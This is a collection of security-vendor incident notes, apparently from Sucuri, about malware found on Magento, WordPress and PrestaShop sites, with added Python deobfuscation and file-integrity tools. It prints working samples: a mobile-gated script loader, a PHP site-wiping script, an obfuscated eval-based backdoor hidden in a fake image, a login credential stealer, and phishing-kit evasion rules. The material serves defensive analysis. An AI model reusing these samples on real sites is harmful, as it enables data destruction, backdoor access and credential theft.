Mobile Malware Targets eCommerce Websites & Users

Mobile malware is malicious software that targets smartphones, tablets and similar devices. The damage ranges from rendering the OS unusable (bricking) to leakage of sensitive personal information such as credit card data, saved passwords, pictures and much more.


With the constant growth of mobile users, attackers are focusing their efforts on developing malware targeting those devices. In this article, we’ll describe how we detected an interesting attack against an ecommerce platform.

During an Incident Response investigation, we identified malicious code in a Magento installation, located in the file “./js/mage/cookies.js”. Here is the snippet:

var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type=\"text/javascript\" src=\"hxxp://Malicious-URL-REMOVED.com/odessa/?md2\"></script>", "write"];
function isMobile() {
    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
    if (/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i[_$_f51c[3]](_0x1CF01) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {
        return true
    };
    return false
}
if (isMobile() === true) {
    document[_$_f51c[6]](_$_f51c[5])
}

The function isMobile() tests the User-Agent (falling back to navigator.vendor and window.opera) against a long list of smartphone and tablet patterns. On a match, document.write() inserts a <script> tag pointing at the attacker's domain, and the remotely served script is what redirects the visitor to other malicious websites. Because the redirect logic lives on the attacker's server, the destination can change at any time without cookies.js being touched again, and desktop visitors, including the site owner, see nothing unusual.
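To work through an injection like this without executing it, here is a small Python helper, added as an example (it is not code from the original labs note): it inlines the _$_f51c[N] string-array lookups that hide the interesting tokens, turns document["write"] back into document.write, and reports which external script the page ends up loading and whether that loader is gated on a mobile User-Agent check. SAMPLE_JS is a constructed, shortened copy of the snippet above; the domain is the page's own redaction, not a real indicator.

```python
import ast
import json
import re

# Constructed sample: a shortened copy of the injected cookies.js shown above.
# The domain is the page's own redaction, not a real indicator.
SAMPLE_JS = r'''
var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type=\"text/javascript\" src=\"hxxp://Malicious-URL-REMOVED.com/odessa/?md2\"></script>", "write"];
function isMobile() {
    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
    if (/android.+mobile|iemobile|ip(hone|od|ad)|windows (ce|phone)/i[_$_f51c[3]](_0x1CF01)) {
        return true
    };
    return false
}
if (isMobile() === true) {
    document[_$_f51c[6]](_$_f51c[5])
}
'''

ARRAY_DECL = re.compile(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*(\[[^\]]*\])\s*;')
DOC_WRITE = re.compile(r'document\.write\s*\(\s*("(?:[^"\\]|\\.)*")\s*\)')
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.I)
UA_GATE = re.compile(r'navigator\.(?:userAgent|vendor)')
MOBILE_RE = re.compile(r'/[^\n]*?(?:android|iphone|ip\(hone|mobile)[^\n]*?/i', re.I)


def _parse_js_array(literal):
    """Parse a JS array of string literals (double- or single-quoted)."""
    for loader in (json.loads, ast.literal_eval):
        try:
            value = loader(literal)
        except (ValueError, SyntaxError):
            continue
        if isinstance(value, list) and all(isinstance(v, str) for v in value):
            return value
    return None


def resolve_string_array(js):
    """Inline NAME[n] lookups into a string array (var NAME = [...]) and turn
    obj["prop"] back into obj.prop so the code reads naturally."""
    for name, literal in ARRAY_DECL.findall(js):
        values = _parse_js_array(literal)
        if values is None:
            continue
        ref = re.compile(re.escape(name) + r'\[(\d+)\]')
        js = ref.sub(lambda m: json.dumps(values[int(m.group(1))])
                     if int(m.group(1)) < len(values) else m.group(0), js)
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', js)


def find_injected_loaders(js):
    """URLs of <script src=...> tags the code writes into the page via document.write()."""
    urls = []
    for m in DOC_WRITE.finditer(resolve_string_array(js)):
        try:
            html = json.loads(m.group(1))   # unescape the JS string literal
        except ValueError:
            continue
        urls.extend(SCRIPT_SRC.findall(html))
    return urls


def is_mobile_gated(js):
    """True when the loader only runs after a User-Agent regex check for mobile devices."""
    resolved = resolve_string_array(js)
    return bool(UA_GATE.search(resolved) and MOBILE_RE.search(resolved))


if __name__ == '__main__':
    print(resolve_string_array(SAMPLE_JS))
    print('loaders:', find_injected_loaders(SAMPLE_JS))
    print('mobile-gated:', is_mobile_gated(SAMPLE_JS))
```

The resolver is deliberately static: nothing from the sample is evaluated, so it is safe to run over files pulled from a compromised host. It only understands the one trick used here (a flat array of literals indexed by constants); rotated or encoded arrays need a real JS interpreter.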

Those websites prompt the visitor to install third-party software that claims to clean or speed up the device, toolbars or adware, or, even worse, serve ransomware that locks the device and holds it hostage until a given amount of money is paid to the attacker in bitcoin.

Depending on the campaign, attackers may also redirect visitors or potential buyers to competitor websites, with a direct impact on the site owner's revenue. Keep in mind that these attacks are not limited to Magento: the same kind of injection can target WordPress, Joomla, OpenCart, PrestaShop and other platforms.

To detect and prevent these issues, we highly recommend having a file integrity monitoring system in place and keeping clean backups of your files and database. If your environment is compromised, you can then identify the modified files and promptly restore them, preventing further damage to your online presence and SEO.

Feel free to contact us if you are experiencing a similar issue or if you have any other security concerns.

PHP Script Nukes All Website Files

Most malware and spam we come across has some discernible purpose, usually one that benefits the attackers financially: spam campaigns, credit card theft, spreading trojans/spyware or phishing scams. Every so often, though, we find something that defies this trend and is just downright evil. We found a PHP script named config-r.php in the root directory of a website that contained the following code:

<?php
//$dir = getcwd();
if ($_GET['id'] == 'red@<redacted>@delete') {
    $dir   = getcwd();
    $files = scandir($dir);
    if (@$_GET['doAction'] == 'delete') {
        rrmdir($dir);
    } else {
        echo '<br /><br /><a href="config-r.php?id=red@<redacted>@delete&doAction=delete">Yes, Delete AllFiles/Folders</a>';
    }
    echo "<br /><br />";
    echo "<pre>";
    print_r($files);
    echo "</pre>";
}
function rrmdir($dir1)
{
    if (is_dir($dir1)) {
        $objects = scandir($dir1);
        foreach ($objects as $object) {
            if ($object != "." && $object != "..") {
                if (filetype($dir1 . "/" . $object) == "dir") {
                    if ($object != 'config-r.php') {
                        rrmdir($dir1 . "/" . $object);
                    }
                } else {
                    if ($object != 'config-r.php') {
                        unlink($dir1 . "/" . $object);
                    }
                }
            }
        }
        reset($objects);
        @rmdir($dir1);
        echo '<br />Deleted All Files/Folders!<br />';
    }
}

This section of the code waits for the attacker to send a request to the php script:

if(@$_GET['doAction']=='delete')

Simply requesting this file in a web browser with doAction=delete appended to the URL and the right pass code in the id parameter recursively removes all website files and directories, effectively wiping the entire site. Without doAction, the script only lists the current directory and prints a confirmation link for the attacker to click. Interestingly, the $object != 'config-r.php' checks spare the malicious script itself, so it remains on the server even after the big red button is pushed, so to speak.

Fortunately, the website on which we found this script was intact and the attackers had not yet nuked it into oblivion. My best guess is that whoever coded this either had an axe to grind against a particular website or just wanted to wreak wanton destruction for the lulz.

If you don't want to leave your site's existence at the mercy of not-so-noble people, make sure you regularly back up your site and don't neglect website security.

Malicious Backdoor Hidden Inside Fake Image

During an incident response investigation, we detected an interesting backdoor hidden in a fake image. The attacker was quite creative, splitting the attack into two steps.


The attacker created two files. The first was a normal-looking PHP file that includes the fake image.

Let’s review the content of the PHP file “./wp-content/themes/twentythirteen/images/3.php”:

<?php include("check-db.jpg"); ?>

The code in “./wp-content/themes/twentythirteen/images/3.php” is a strange use of include(): it pulls in check-db.jpg, which by itself is not malware. It is the key to the trick, though. PHP's include() does not care about file extensions; whatever the target contains between <?php and ?> is parsed and executed as PHP, so a file named .jpg runs exactly like a .php script, while most people (and some scanners) treat an images directory as harmless.

Let’s inspect the image "check-db.jpg". When opened in the browser it looked as if the image was corrupt: nothing was displayed.

We then opened the file in a normal text editor and found the main source of the backdoor.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";
$_A=strrev("esab")."64_".strrev("edoced");
$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');
$trd=strrev("taerc")."e_f".strrev("noitcnu");
$ctel=$trd('$_S',$_X);
$ctel($_S); ?>

Let’s work through the malicious code located inside the fake image “./wp-content/themes/twentythirteen/images/check-db.jpg” step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $_S holds the payload: a base64-encoded, deflate-compressed blob containing the PHP code that implements the backdoor the attacker will use to gain access to your website (truncated here).

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";

The variable $_A holds the name of the function base64_decode, assembled from reversed fragments so that the literal name never appears in the file. Before the strrev() calls are evaluated:

$_A=strrev("esab")."64_".strrev("edoced");

strrev("esab") is "base" and strrev("edoced") is "decode", so after evaluation:

$_A = "base64_decode";

Next, a base64-encoded string is passed to $_A(), i.e. to base64_decode. The decoded result is stored in $_X and is the one-liner that will later unpack and run the real payload kept in $_S.

$_X before decoding:

$_X = $_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');

$_X after decoding (at this point it is still just a string, nothing has been executed yet):

$_X = 'eval(gzinflate(base64_decode($_S)));';

The variable $trd holds the name of create_function, again assembled from reversed fragments. Before:

$trd=strrev("taerc")."e_f".strrev("noitcnu");

After:

$trd = "create_function";

With both names resolved, the last two statements are equivalent to:

$ctel = create_function('$_S', 'eval(gzinflate(base64_decode($_S)));');
$ctel($_S);

create_function() compiles its second argument as the body of a new anonymous function taking $_S as its parameter (it is an eval() in disguise, which is why it was deprecated in PHP 7.2 and removed in PHP 8.0). Calling $ctel($_S) then base64-decodes and gzinflates the blob and eval()s the resulting PHP. That is the moment the backdoor code actually runs and gives the attacker access to your website's files and folders.
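The manual unpacking above can be automated. The following Python code is an added example (not code from the labs note or from the malware): it evaluates strrev() on literals, folds dot-concatenated literals, resolves variables that hold a function name, decodes base64_decode() of literals, and unpacks eval(gzinflate(base64_decode('...'))) stage-two payloads the way the PrestaShop note further down shows them. FAKE_IMAGE_PHP is a constructed copy of the check-db.jpg wrapper with the $_S blob truncated as it is on the page; STEALER_BODY is a constructed, shortened version of the credential-stealer one-liner used only to build a packed sample.

```python
import base64
import binascii
import re
import zlib

# Constructed copy of the fake image's PHP as quoted above; the $_S blob is
# truncated ("...") exactly as it is on the page, so only the wrapper is analysed.
FAKE_IMAGE_PHP = ('$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr...yATx5A1QePTKD1/kV6K8xfVv";'
                  '$_A=strrev("esab")."64_".strrev("edoced");'
                  "$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');"
                  '$trd=strrev("taerc")."e_f".strrev("noitcnu");'
                  "$ctel=$trd('$_S',$_X);$ctel($_S); ?>")


def resolve_strrev(php):
    """strrev("esab") -> "base": evaluate strrev() applied to a string literal."""
    return re.sub(r'strrev\(\s*(["\'])(.*?)\1\s*\)',
                  lambda m: m.group(1) + m.group(2)[::-1] + m.group(1), php)


def join_concats(php):
    """Fold "a"."b" (PHP's dot operator on two literals) into "ab", repeatedly."""
    pat = re.compile(r'(["\'])([^"\']*)\1\s*\.\s*(["\'])([^"\']*)\3')
    prev = None
    while prev != php:
        prev, php = php, pat.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', php)
    return php


def inline_string_vars(php):
    """$f="base64_decode"; $f(...) -> base64_decode(...): resolve variable
    functions whose value is a plain literal that looks like a function name."""
    for var, val in re.findall(r'(\$\w+)\s*=\s*"([^"]*)"\s*;', php):
        if re.fullmatch(r'[A-Za-z_]\w*', val):
            php = re.sub(re.escape(var) + r'(?=\s*\()', lambda m, v=val: v, php)
    return php


def decode_base64_literals(php):
    """base64_decode('...') on a literal -> the decoded text, when it is printable."""
    def repl(m):
        try:
            text = base64.b64decode(m.group(2), validate=True).decode('ascii')
        except (binascii.Error, UnicodeDecodeError):
            return m.group(0)
        if not text.isprintable():
            return m.group(0)
        return "'" + text.replace("'", "\\'") + "'"
    return re.sub(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)', repl, php)


def deobfuscate(php):
    for step in (resolve_strrev, join_concats, inline_string_vars, decode_base64_literals):
        php = step(php)
    return php


def gzinflate_b64(payload):
    """PHP's gzinflate(base64_decode($x)). gzinflate expects raw DEFLATE (wbits -15);
    the zlib (15) and gzip (31) framings cover the gzuncompress/gzdecode variants."""
    data = base64.b64decode(payload)
    for wbits in (-15, 15, 31):
        try:
            return zlib.decompress(data, wbits).decode('utf-8', 'replace')
        except zlib.error:
            continue
    raise ValueError('not a DEFLATE/zlib/gzip stream')


def deflate_b64(text):
    """Inverse of gzinflate_b64, used here only to build constructed test data."""
    co = zlib.compressobj(wbits=-15)
    return base64.b64encode(co.compress(text.encode()) + co.flush()).decode()


PACKED = re.compile(r'eval\(\s*gzinflate\(\s*base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)\s*\)\s*\)')


def find_packed_payloads(php):
    """Decode every eval(gzinflate(base64_decode('...'))) found in a file."""
    return [gzinflate_b64(m.group(2)) for m in PACKED.finditer(php)]


# Constructed stage-two sample: a shortened form of the swiper one-liner quoted in
# the PrestaShop note, packed the way the AuthController.php injection packs it.
STEALER_BODY = ('if(function_exists("fopen")){$fp=fopen("AjaxController.php","a");'
                'fwrite($fp, $email." || ".$passwd);fclose($fp);}')
PACKED_SAMPLE = "eval(gzinflate(base64_decode('" + deflate_b64(STEALER_BODY) + "')));"

if __name__ == '__main__':
    print(deobfuscate(FAKE_IMAGE_PHP))
    print(find_packed_payloads(PACKED_SAMPLE))
```

All steps are textual rewrites, so the sample is never executed; the output still contains $ctel($_S) because the real blob is truncated on the page, and on a full sample the decoded $_S would be the next thing to read, not to run.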


If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Protecting Phishing Pages via .htaccess

Phishers usually want to protect their pages from being detected by search engines and security companies. To achieve that, they add .htaccess files that deny access to their phishing directories from known IP addresses and networks. Depending on the scenario, if they are targeting a specific service (online banking, for instance), attackers may allow only visitors from a specific country to see the phishing page.


Attackers' skill sets vary, though; some just customize third-party scripts they find online, and it is not uncommon for them to do it poorly. For example, one phishing campaign used a bot-blocking .htaccess file that can easily be found on the Internet. It does keep some unwanted bots away and saves bandwidth, but it has very little to do with search engines, security companies or geographic regions (although it happens to block a few of them):

deny from 216.163.255.1 # rpa.metlife.com bored employees
deny from 67.127.164.125 # DSL bandwidth waster
deny from 193.253.199. # france SE art-online.com bandwidth waster
deny from 80.179.254. # clown from Israel using downloader
deny from 64.37.103. # spambots and other non customers
deny from 69.61.12.100 # spambot from servershost.net

Along with the .htaccess file, there may be other files within the phishing structure, such as:  

  • Image directories (img/images): logos, header/footer images and other assets copied from the impersonated brand (PayPal, banks, etc.).

A Simple Prestashop Login Swiper

In a compromised environment, attackers may inject malicious code into different files, including the core files of the CMS, in order to maintain access to the website and/or obtain sensitive data. Although these issues are simple to identify and remediate, not all users constantly monitor their websites for such file integrity breaches.


One of these injections is known as a credential stealer: it intercepts the authentication mechanism and saves the username/password either to a file or by e-mailing them to the attacker.

During an Incident Response process, we found malware of this category injected into the PrestaShop file “./controllers/AuthController.php”. Here is the snippet:

if (Tools::isSubmit('SubmitLogin'))
{
    Module::hookExec('beforeAuthentication');
    $passwd = trim(Tools::getValue('passwd'));
    $email = trim(Tools::getValue('email'));
    if (empty($email))
        $this->errors[] = Tools::displayError('E-mail address required');
    ...
    elseif (Tools::strlen($passwd) > 32)
        $this->errors[] = Tools::displayError('Password is too long');
    elseif (!Validate::isPasswd($passwd))
        $this->errors[] = Tools::displayError('Invalid password');
    else
    {
        eval(gzinflate(base64_decode('bY7fCoIwHIXvBd9BfnihIL5AJkiuuilj2R+IGGYbLsyNzVDI3j016Kbuzsf5OBzOHPao8pqLitCW61o7wISkFbju0zRsJqcjOhDdsnYmqlqJsqTKl4UEDzJwJ6bBGsVr6vHSB6vrLPBtmWndXL9ItgjvET7BMk035EjmCT5EOEbxkOD862G0SlJEojj+W48zu55ItEDrdFCCiwqDQoWfZ3kp9PhsoNcb')));
        $customer = new Customer();
        $authentication = $customer->getByEmail(trim($email), trim($passwd));
        if (!$authentication OR !$customer->id)

Obfuscation like this is a very common technique attackers use to hide malicious code, but most scanners will alert on files containing a combination of eval() with base64_decode() and gzinflate(). Note where the line sits: after the input validation and right before the legitimate Customer lookup, so only submissions that pass PrestaShop's own checks, i.e. real login attempts, get logged.

When decoding it, we could see the following snippet:

if (function_exists("fopen")) {
    $fp = fopen("AjaxController.php", "a");
    fwrite($fp, $email . " || " . $passwd . " || " . $_SERVER["HTTP_X_FORWARDED_FOR"] . " || " . $_SERVER["REMOTE_ADDR"] . " || " . $_SERVER["HTTP_USER_AGENT"] . "<br><hr>");
    fclose($fp);
}

The code above runs every time a customer submits the PrestaShop login form (AuthController handles front-office customer authentication, not the back office) and appends the e-mail, password, IP address (both REMOTE_ADDR and any X-Forwarded-For header) and user agent to the file AjaxController.php. The name is chosen to blend in with legitimate controllers, and because the path is relative the file lands in the script's working directory, normally the web root, where it can be fetched over HTTP.

From there, all the attacker has to do is download that file to get a list of credentials, log into the customers' accounts, change payment information, create bogus users and perform all kinds of other malicious activities.

On a previous blog post about another credential stealer, we showed how an attacker can send stolen credentials to an email address. The case described in this article though tends to be simpler and more reliable because there's no need for an email account in order to be successful.

To prevent such attacks, keep your Prestashop site and modules always up to date and remember to monitor your core files. If you suspect that your site has been compromised and needs specialized assistance, our security analyst at https://sucuri.net will be glad to help.
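The "monitor your core files" advice here and the file integrity monitoring recommended at the end of the Magento note above boil down to the same mechanism. As an added Python example (not the labs' own tooling): hash every file under the web root, keep the result as a baseline, and diff later snapshots against it. demo() builds a tiny fake web root in a temporary directory and replays the three changes discussed on this page: an appended loader in js/mage/cookies.js, an eval() injection in controllers/AuthController.php and a dropped config-r.php. All file names and contents in the demo are constructed. Caveat: the baseline must live where the web server user cannot write (off-host, or at least outside the web root), otherwise an attacker who could edit AuthController.php can just as easily re-baseline.

```python
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk=1 << 16):
    """SHA-256 of a file, streamed so large uploads are not loaded into memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for block in iter(lambda: f.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """{relative path: sha256} for every regular file under root (symlinks skipped)."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            snap[rel] = hash_file(full)
    return snap


def save_baseline(snap, path):
    with open(path, 'w') as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Added, removed and modified paths between two snapshots."""
    old, new = set(baseline), set(current)
    return {
        'added': sorted(new - old),
        'removed': sorted(old - new),
        'modified': sorted(p for p in old & new if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: baseline a fake web root, then replay the injections
    described on this page and report what a later check would flag."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        def write(rel, text):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'w') as f:
                f.write(text)

        write('js/mage/cookies.js', '/* legitimate Magento cookies.js */')
        write('controllers/AuthController.php', '<?php // legitimate PrestaShop controller')
        baseline_path = os.path.join(store, 'baseline.json')   # kept outside the web root
        save_baseline(snapshot(root), baseline_path)

        # Attacker activity modelled on this page: loader appended, core file
        # injected, destructive script dropped.
        write('js/mage/cookies.js', '/* legitimate Magento cookies.js */ document.write("<script src=...>")')
        write('controllers/AuthController.php', '<?php eval(gzinflate(base64_decode("...")));')
        write('config-r.php', '<?php // recursive deletion script')

        return compare(load_baseline(baseline_path), snapshot(root))


if __name__ == '__main__':
    for kind, paths in demo().items():
        print(kind, paths)
```

In production, run snapshot() from cron and compare against a baseline taken right after a clean install or update; every legitimate deployment re-baselines. The credential dump AjaxController.php from this note would show up under "added" the same way config-r.php does here.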

Phishing the Right Phish

Social engineering techniques, like phishing, can be powerful in persuading users into performing specific actions or disclosing confidential information. In these types of scenarios, attackers look for vulnerable sites on the web to upload fake pages pretending to be trustworthy organizations, such as banks, email and payment services, etc.


During an incident response process, we identified a phishing directory called “login-apple-account” in the website's root. When accessed over HTTP, it displayed a very well-structured fake version of the Apple ID website.

Although at first it may seem just a regular phishing attempt, the page would be displayed only to a very specific set of visitors.

This conditional attack implemented several evasion techniques to block access from specific IP ranges and, in some cases, to send search engines, antivirus and anti-phishing companies to the official Apple ID website (through a Google redirect URL) using raw header() calls:

header("Location: hXXps://www[.]google[.]ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwi_yey8kvzJAhWwj4MKHVp5ALcQFggcMAA&url=hXXps%3A%2F%2Fappleid[.]apple[.]com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww");

For instance, the “login-apple-account/assets/includes/netcraft_check.php” file prevents the malicious page from being served when the User-Agent equals the string the phisher attributes to the crawler of Netcraft, an anti-phishing company, redirecting it to a Google search result page instead:

<?php
if ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {
    header("Location: hXXps://www[.]google[.]ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=;uact=8&ved=0ahUKEwi_yey8kvzJAhWwj4MKHVp5ALcQFggcMAA&url=hXXps%3A%2F%2Fappleid[.]apple[.]com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww");
    die();
}
?>

Other files refer to the “login-apple-account/assets/includes/blacklist.dat”, which has quite a big list of IP ranges from several services, to prevent them from accessing the phishing page:

#  NETCRAFT IP RANGES
194.52.68.0-194.52.68.255
194.72.238.0-194.72.238.255
83.138.182.72-83.138.182.79
83.138.189.96-83.138.189.103
81.91.240.0-81.91.255.255
89.36.24.0-89.36.31.255
83.222.232.216-83.222.232.218
184.172.0.0-184.173.255.255
#  KASPERSKY IP RANGES
...

Several other antivirus and anti-phishing companies' IP ranges were listed in that file as well, so the phishing page would go unnoticed during a regular crawl, preventing the phishing URL from getting into blacklists.
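When triaging a kit like this it helps to know exactly who the phisher is hiding from, both for this blacklist.dat and for the .htaccess deny rules in the earlier note. The following Python code is an added example (not the kit's code and not Sucuri tooling): it parses the start-end ranges of blacklist.dat and Apache 2.2 "deny from" lines in their three forms (full address, dotted prefix such as 193.253.199., CIDR), then answers whether a given source IP or User-Agent would be sent to the real site instead of the phishing page. BLACKLIST_DAT and HTACCESS are constructed file texts holding only the lines quoted on this page; NETCRAFT_UA is the string from netcraft_check.php above.

```python
import ipaddress
import re

# Excerpt of the kit's blacklist.dat as quoted above (constructed file text:
# only the Netcraft lines the page shows).
BLACKLIST_DAT = """\
#  NETCRAFT IP RANGES
194.52.68.0-194.52.68.255
194.72.238.0-194.72.238.255
83.138.182.72-83.138.182.79
83.138.189.96-83.138.189.103
81.91.240.0-81.91.255.255
89.36.24.0-89.36.31.255
83.222.232.216-83.222.232.218
184.172.0.0-184.173.255.255
"""

# The bot-blocking .htaccess lines quoted in the earlier note.
HTACCESS = """\
deny from 216.163.255.1 # rpa.metlife.com bored employees
deny from 67.127.164.125 # DSL bandwidth waster
deny from 193.253.199. # france SE art-online.com bandwidth waster
deny from 80.179.254. # clown from Israel using downloader
deny from 64.37.103. # spambots and other non customers
deny from 69.61.12.100 # spambot from servershost.net
"""

# User-Agent string netcraft_check.php compares against (quoted above).
NETCRAFT_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"


def parse_range_file(text):
    """blacklist.dat style: 'first-last' (or a single address) per line, '#' comments."""
    nets = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        if '-' in line:
            first, last = (ipaddress.ip_address(p.strip()) for p in line.split('-', 1))
            nets.extend(ipaddress.summarize_address_range(first, last))
        else:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def parse_htaccess_deny(text):
    """Apache 2.2 'deny from X': X may be 'all', a full address, a dotted prefix
    such as 193.253.199. (the whole /24), or CIDR. Apache 2.4 spells the same
    rule 'Require not ip', which is not handled here."""
    nets = []
    for raw in text.splitlines():
        m = re.match(r'\s*deny\s+from\s+(\S+)', raw, re.I)
        if not m:
            continue
        token = m.group(1)
        if token.lower() == 'all':
            nets.append(ipaddress.ip_network('0.0.0.0/0'))
            continue
        if token.endswith('.'):
            octets = token.rstrip('.').split('.')
            token = '.'.join(octets + ['0'] * (4 - len(octets))) + '/%d' % (8 * len(octets))
        nets.append(ipaddress.ip_network(token, strict=False))
    return nets


def is_blocked(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def phisher_would_redirect(ip, user_agent, nets):
    """Reproduce the kit's gate: a listed source IP or the hard-coded crawler UA is
    sent to the real site; everyone else is shown the phishing page."""
    return is_blocked(ip, nets) or user_agent == NETCRAFT_UA


if __name__ == '__main__':
    nets = parse_range_file(BLACKLIST_DAT) + parse_htaccess_deny(HTACCESS)
    for ip in ('194.52.68.17', '193.253.199.77', '203.0.113.5'):
        verdict = 'redirected' if phisher_would_redirect(ip, 'Mozilla/5.0', nets) else 'phished'
        print(ip, verdict)
```

The practical use is the inverse of the phisher's: if your scanner's egress address or User-Agent is on the list, a remote crawl will report the page as clean, which is exactly why the note recommends a server-side scan.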

Even though it tries to hide itself via HTTP, it cannot stop a server-side scan, so our server-side scanner is able to detect and alert you asap about such phishing pages. If you’re looking for a security solution that helps you avoid such issues, let us know.

Yet Another Expired Domain causes WP Plugin to...

Malicious redirects are very common in compromised websites. Attackers try to take advantage of the site resources to promote spam, distribute other malware/backdoors, and perform all kinds of malicious activities.

The type of attack described in this labs note, though, doesn't involve a single compromised website but lots of them being affected at the same time. This is not a new technique, and we have already covered it in a blog post (https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html), but this variant caught our attention because another plugin was being targeted.

During an Incident Response investigation, we found that malicious redirects were coming from a JavaScript loading via the website enmask.com, which is part of a WordPress plugin called “Enmask Captcha”. https://wordpress.org/plugins/enmask-captcha-text-based-hosted-captcha-solution/

“This plugin hasn’t been updated in over 2 years. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.“

The plugin's domain appears to have expired and somebody else purchased it. Anyone still using the plugin now experiences redirects on their website, since the new owner of the domain is deliberately serving redirect code.

Here are some more details about this plugin and what is causing the redirect:

Code found on the page:

<script type="text/javascript" data-enmask-langcode="en-US" src="hxxp://enmask[.]com//Scripts/Enmask.Captcha.js" data-enmask="true" data-enmask-name="myCaptcha"></script>

Clicking anything on the website leads to this page:

